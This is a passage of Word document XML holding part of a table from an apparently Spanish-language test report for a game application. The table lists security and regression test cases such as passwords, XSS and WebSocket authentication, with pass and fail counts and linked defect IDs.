          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-05 (Contraseñas)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-06 (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-08 (WS Auth)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-09 (Datos Sensibles)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-07 (checkWinner)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-10 (IA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-01 (Login carga)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-02 (WS moves)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
